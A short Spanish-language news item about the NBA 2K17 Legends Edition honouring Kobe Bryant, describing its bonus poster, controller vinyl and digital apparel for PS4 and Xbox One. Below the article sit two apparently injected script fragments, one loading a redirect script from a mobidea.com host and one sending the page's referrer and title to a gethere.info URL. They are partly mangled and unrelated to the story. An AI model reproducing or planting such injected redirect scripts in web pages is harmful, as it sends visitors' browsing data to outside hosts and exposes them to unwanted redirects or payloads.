Kobe Bryant tendrá su portada especial en el “NBA 2K17”

Con motivo del retiro de Kobe Bryant de las duelas profesionales de basquetbol, la franquicia NBA 2K, anunció la Edición Leyendas de NBA, la cual estará protagonizada por el legendario número 24 de los Lakers.

La nueva entrega servirá para rendir homenaje a la “Mamba Negra”, ya que incluirá diversos contenidos relacionados con su carrera.

El juego incluirá artículos físicos como póster de Kobe y un vinilo para el control inspirado en el basquetbolista, además de contenido digital exclusivo como calzado, camisetas y sudaderas de Kobe.

La Edición Leyenda de NBA 2K17 sólo estará disponible para PS4 y Xbox One, y se espera que salga a la venta en el mes de septiembre del año en curso.

Esta será la segunda ocasión que Kobe Bryant aparezca en la portada del famoso videojuego, sólo que esta ocasión es para rendirle tributo a uno de los mejores jugadores de la historia.

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||||
Comentarios